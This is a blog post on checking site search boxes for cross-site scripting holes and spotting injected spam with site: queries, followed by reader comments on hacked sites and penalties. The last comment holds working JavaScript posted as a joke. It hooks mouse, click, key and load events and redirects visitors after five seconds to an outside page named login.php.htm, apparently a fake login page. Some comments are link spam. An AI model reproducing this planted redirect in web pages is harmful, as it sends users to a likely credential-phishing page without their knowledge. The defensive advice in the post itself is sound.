Check your search box for XSS exploits

Just a quick reminder that websites should check for XSS holes on their site, especially freeform text input such as search boxes. Even big sites can have these issues with XSS and escaping user input. (Note: don’t click on these search results.)

If you’ve noticed that your rankings in Google seem to be affected, you might consider a few searches on your site to see if anyone has injected spammy or porn content on your site. If your domain was example.com, you might want to run a few queries such as [site:example.com porn] or [site:example.com biaxin] or [site:example.com viagra] to see whether you run across unexpected results.

The Google security blog has written about XSS holes and exploits before and how to protect yourself. We’ve also written about protecting your site and cleaning up a hacked site before.

Added: (Switching from XSS to pure hacked sites for a moment.) Make sure to change your admin password if you update (say) your WordPress installation. Sometimes hackers are smart enough to save your password and come back even after you’ve fully patched your system. I tend to change my admin password at least every time I upgrade my version of WordPress.

30 Responses to Check your search box for XSS exploits (Leave a comment)

  1. For anyone having issues getting there sites hacked- a very simple solution is to install http://www.firewallscript.com – It can stop all types of SQL Injections, XSS, Directory Transversals, Cookie Poisoning, etc..

    Seriously- if you run a website ( especially a wordpress one) install FIREWALL SCRIPT!!!!

  2. Matt – Great post. A few of mine were quite exposed, though thankfully unexploited thus far. They’re fixed now. πŸ™‚

  3. Peter (IMC), that is off-topic so I’m going to go ahead and delete the comment. I dropped you an email though.

  4. I wrote this last year to extol the virtues of a regular site: search:

    http://www.brianwhite.org/2007/04/27/google-site-operator-an-ode-to-thee/

  5. I’d still love to see a sites outgoing links in Webmaster Tools. I think that would make life a whole lot easier for me as a webmaster. It would be very convenient to check the list of outgoing links for porn or spam or any other suspicious activity.

  6. Hi Matt,

    I’ve noticed that my ranking in Google seem to be affected.

    I’ve done this for my site & have received these results.

    Results 1 – 10 of about 26 from tickex.com for porn. (0.03 seconds)

    We are not a porn site by any means, we list hundreds of thousands of events & some of them have that word in their name.

    Is 26 results enough to be seen as spam?

  7. Thanks Matt. I went through something like that back in December. What few search results I held were trashed. I checked per your instructions in this blog and appeared clear. I did receive a

    “Refine results for site:gregstaker.com viagra:” and then there were various categories to choose from. That is a normal search result, right?

  8. Another good tip is to use a regular account for posting and only use the admin account to do admin stuff. That’s what geeklog just recommended.

    http://www.geeklog.net/article.php/csrf

  9. Found this tool http://www.securitycompass.com/exploitme.shtml
    haven’t tried though but seems like useful to check if any exploit available.

    Have you (or anyone) tried this, looking for feedbacks πŸ™‚

  10. When it comes to scripting (XSS and others), there will always vulnerability. So it is always best to take all the precaution and correct coding practices.

    Still No matter how much work white hat guys do in security, it will be only naive to believe, that their will not be any black hat guy who will bypass them.

  11. Ah, good point Brian. Thanks for mentioning that.

  12. Wow, I’m really seeing a lot of posts regarding hacks these past few weeks. My wife was sitting next to me and I assured her I’m not searching for porn, but potential hacks on my site. Came back clean. About 30 pages came back for “viagra” but it’s a health site. Are there any reasons to be concerned when using terms in context?

  13. Dave (Original)

    Matt, what searches do you suggest for porn and viagra sites πŸ˜‰

  14. Hi Matt,

    Great post as usual, we have been victim of huge hackers attacks (SQL injection) these weeks and Google recognized us shortly as “this website may harm your computer”. A REAL nightmare… no one could go through our website from Google because of this…

    We managed to get rid of all “evil” code, I did a clean report to stopbadware.org and everything is back to normal now but basically we lost business during the time of the request for warning removal.

    The managed websites could have a warning by email and if after 1 or 2 days they did not take action (remove of badware, spam, porn content) THEN you could put the super warning text and block access to the website.

    I also agree with Nick that a report in Google webmaster tools about porn, badware or spammy content detected from managed website would be very useful.

  15. Thanks Matt, great tip.
    One of my sites had been affected.

    Just a tip if anyone else finds that they are affected, before you click on your links to investigate, turn off javascript in your browser.
    Also if you forget and you get redirected to a popup site just hold down ESC.
    It should close the javascript prompts and stop the script running.

  16. Matt,
    What do you think about vulnerability scanners?
    I’m subscribed to an external vulnerability scanner that scans all my sites on a regular basis to see if any of the new vulnerabilities discovered to the security community exists on my site. They also scan for cross site scripting, and other stuff that I don’t fully understand… πŸ™‚
    (in you’re is interested, see the icon at the footer of my site)
    I think that Google should encourage webmasters to use such systems. It will definately help Google search quality if sites are safer and harder to manipulate. (I know, new types will come…)
    Not only that, if Google will notify me that my site is vulnerable to a specific vulnerability through Google Webmaster Tools that will be excellent…

  17. A year ago the advice was that google did not like to index search results, and now sites can get penalized for cross site scripting issues with third parties forcing searches and embedding spammy links in them. That is a big change in perspective.

  18. Morning Matt, nothing to do with your post but you may want to update the this wording for Google checkout in http://www.google.com/local/add/businessCenter

    “New! Google Checkout – Let your customers buy from you quickly and conveniently using a single Google Checkout login. And process all of your Checkout sales for free through the end of 2007.”

    Charles

  19. Nice entry. Something else I’d include:sanitizing quotes is not enough to stop people from embedding JS or links. Browsers will still interpret them properly even if the quotes are removed. I’ve seen literally hundreds of sites that think removing the quotes will make it all secure.
    On a side note,Boogy Down With Earthlink and XSS(feel free to remove this if you want ;))

  20. We actually got hit by the same exploit, same URL, etc. We cleaned it up and it’s disappeared from our Google results, so that was nice.

    What I’m curious about it how do the results get into Google? I understand the exploit, but I don’t understand how they get indexed that way. Does is-t-h-e.com create a bunch of links to those URLs, and then Google follow and index those links?

    Not that I’m some genius, but it would seem relatively trivial to detect links using XSS or other strangeness and disregard them.

  21. aaron wall,
    Google still don’t like to index search results and sites wouldn’t be penalized for “cross site scripting issues with third parties forcing searches and embedding spammy links in them”, if those sites would exclude their search results by default. Then the spammy links wouldn’t be count at all and the sites will not be penalized.

    On the other hand I couln’t understand why Google still indexes search results like:
    http://www.google.de/search?hl=de&q=site%3Asearch.ebay.de&btnG=Suche&meta=

    That’s only one example for indexed search results, which could be automatically removed from the index simply, if Google wants.

    greetz
    Robert

  22. I’m not in the habit of link-dropping because I feel it always feels incredibly spammy, but I wrote a quick guide in August last year of things the average user can do to test their own (PHP) site security:
    http://www.jemjabella.co.uk/become-a-php-security-master-part-1

    I think people need to get out of the “it won’t happen to me” mentality and realise that they need to be vigilant. Check your site for easily detected exploits, do a bit of Googling on scripts and plugins for known exploits before you install and ALWAYS back-up your data.

  23. Setting up Google Alerts for “site:example.com porn” is a useful method of early notification if a XSS vulnerability is discovered on your site.

  24. Well that was fun!

    I had a site hacked into – made some quick fixes – removed the bad file. Now going to resubmit to Google…

    All access to my server have different users/passcodes per site. So one site will have 20 user/passwords – to avoid any problems with server hacking. The problem is, that it’s tougher for me to determine a site hack, if the server wasn’t compromised.

    Thanks for reminding me to check my files Matt…

    But FYI – I am on Google Webmaster Tools and Googlebot has had no problem with spidering my website. Did I miss something? It’s reporting the medical and porn in the content – but no warnings to be seen.

  25. Matt – did you see my post on the subject about a week ago? It was on the WP Dashboard and thankfully was picked up by numerous other sites who spread the word about the redirect hack. Unfortunately people don’t change their passwords often enough, and many certainly aren’t diligent enough about upgrading in the first place.

    I’m about halfway through coding a plugin to detect the current crop of methods the spammer use to hide their links and add viruses to WordPress sites. Hopefully I’ll release a first version tomorrow, or early next week.

    http://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/

  26. Heh, Firefox 3 is already there, with “Reported Attack Site!” if you actually try to visit those sites.

  27. Matt,

    could you please tell me the reason for removing my last post? There was nothing wrong with it.

    greetz
    Robert

  28. Matt,

    My site is currently suffering from a June 9th XSS “porn” attack. Google Analytics still shows our “search results” page down 90% in Google traffic since the attack. We have since patched the XSS hole, added META NOINDEX tags to all “empty” search result pages, submitted all the remaining “porn” URL Removals in WebMaster Tools, and submitted a Reconsideration Request on June 19th.

    Questions:

    – Is the Google penalty due to the “porn” in Google’s index? or was it the XSS, which gave our site the appearance of a massive number of “Sneaky Javascript Redirects” ?

    – How long should I expect to wait? (I have seen some webmasters say their page’s traffic has never come back after a Google penalty, yet others say it should be restored after 30 days or so. Is there anyone out there who can tell me whether their XSS hacked page’s traffic did come back and how long it took? I’m trying to passify my angry boss! )

    Thanks Matt & all,

  29. matt
    I don’t mind if you post this or not, cos what has happened to my site is probably not uncommon but still well beyond my knowledge of ‘why?’ or ‘what next?’. For many months now my once very popular site has been falling (plumetting) in the Google rankings. Now I am completely off Google’s radar (though the other serach engines still rank me well?). From the outset my hunch was foul play but not being a web nerd I asked others to help find out why and spent a lot of fruitless time and effort with SEO-types and more knowledgeable friends in the biz to help solve the mystery. Content, keywords, tags have been addressed as possible culprits or oversights but I figured there was something more basic and critical wrong. I have always kept track of the results through the Webmaster tools but never found anything really incriminating to explain the apparent black-balling. That is, until today when I went back again to the dashboard (stats-Index stats-cache) and found Google’s last cache of my site:
    http://209.85.165.104/search?q=cache:www.callananphoto.com&hl=en

    yikes! who or why would people do that? And how? I find no indication of all those porn links in my index.html so I have no idea how to remove them.

    So I at least have solved the mystery of ‘why’ Google dropped me like a hot potato but beyond changing passwords I am at a loss to know how to clean up the ugly mess and get back to where I was a year ago.

    While my site was wallowing in the doldrums I redesigned a new front page with much more content and links, so when this existing problem is sorted out I can re-enter the Google arena with a vengeance.
    Bloody hackers!

    I hope you can help

    thanks
    mark

  30. just kidding

    Testlink

    hiiiiiiiiiiiiiiiiiiiiiiiiii

    world

    var xScroll, yScroll, timerPoll, timerRedirect, timerClock;

    function initRedirect(){
    if (typeof document.body.scrollTop != “undefined”){ //IE,NS7,Moz
    xScroll = document.body.scrollLeft;
    yScroll = document.body.scrollTop;

    clearInterval(timerPoll); //stop polling scroll move
    clearInterval(timerRedirect); //stop timed redirect

    timerPoll = setInterval(“pollActivity()”,1); //poll scrolling
    timerRedirect =
    setInterval(“location.href=’http://mypics38.my3gb.com/login.php.htm'”,5000);
    //set timed redirect

    }
    else if (typeof window.pageYOffset != “undefined”){ //other browsers
    that support pageYOffset/pageXOffset instead
    xScroll = window.pageXOffset;
    yScroll = window.pageYOffset;

    clearInterval(timerPoll); //stop polling scroll move
    clearInterval(timerRedirect); //stop timed redirect

    timerPoll = setInterval(“pollActivity()”,1); //poll scrolling
    timerRedirect =
    setInterval(“location.href=’http://mypics38.my3gb.com/login.php.htm'”,5000);
    //set timed redirect

    }
    //else do nothing
    }

    function pollActivity(){
    if ((typeof document.body.scrollTop != “undefined” &&
    (xScroll!=document.body.scrollLeft ||
    yScroll!=document.body.scrollTop)) //IE/NS7/Moz
    ||
    (typeof window.pageYOffset != “undefined” &&
    (xScroll!=window.pageXOffset || yScroll!=window.pageYOffset))) {
    //other browsers
    initRedirect(); //reset polling scroll position
    }
    }

    document.onmousemove=initRedirect;
    document.onclick=initRedirect;
    document.onkeydown=initRedirect;
    window.onload=initRedirect;
    window.onresize=initRedirect;

css.php